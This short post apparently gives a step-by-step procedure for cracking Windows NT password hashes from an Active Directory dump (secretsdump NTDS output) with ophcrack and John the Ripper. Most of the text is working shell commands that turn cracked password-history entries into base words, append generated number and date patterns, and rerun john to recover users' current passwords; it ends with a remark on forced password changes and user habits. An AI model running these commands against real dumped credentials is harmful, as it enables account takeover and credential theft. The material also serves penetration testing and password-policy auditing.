Let's assume using ophcrack for cracking NT hashes in pwdump format where the pwdump includes password history hashes also. Assume we have cracked several hashes in the history.
Steps for getting more passwords cracked (assuming users just increase/decrease/edit numbers at the end of their passwords on regular forced password change by policy):
- Get cracked passwords (including history):
cat ophcrack.pwdump | grep -v ':::$' | awk -F: '{ print $7 }' | sort -u > wordlist_ophcracked.txt
- Feed it to john:
john secretsdump.ntds.pwdump --format=nt --wordlist=wordlist_ophcracked.txt
- Strip the numbers at the ending:
cat wordlist_ophcracked.txt | sed -e 's/[0-9]*$//' | sort -u > wordlist_ophcracked_base.txt
- Generate some common patterns (feel free to include more):
for i in `seq 1 1000` ; do echo $i ; done > num_1.txt
for i in `seq 1 9999` ; do printf "%04d\n" $i ; done > num_2.txt
for i in `seq 1 99` ; do printf "%02d\n" $i ; done > num_3.txt
for i in `seq 1 365` ; do date --date "2000-01-01 +$i day" +'%m%d' ; done > num_4.txt
cat num_*.txt | sort -u > num.txt
- Combine the number patterns with the base words (could be slow, but at least it is a one-liner :) ):
while read w ; do while read n ; do echo $w$n ; done < num.txt ; done < wordlist_ophcracked_base.txt > wordlist_ophcracked_combined.txt
- Attack the hashes with the combined wordlist:
john secretsdump.ntds.pwdump --format=nt --wordlist=wordlist_ophcracked_combined.txt
The result should include much more cracked passwords, not only history, but active passwords.
That's all about forced password change by policy and user behaviour.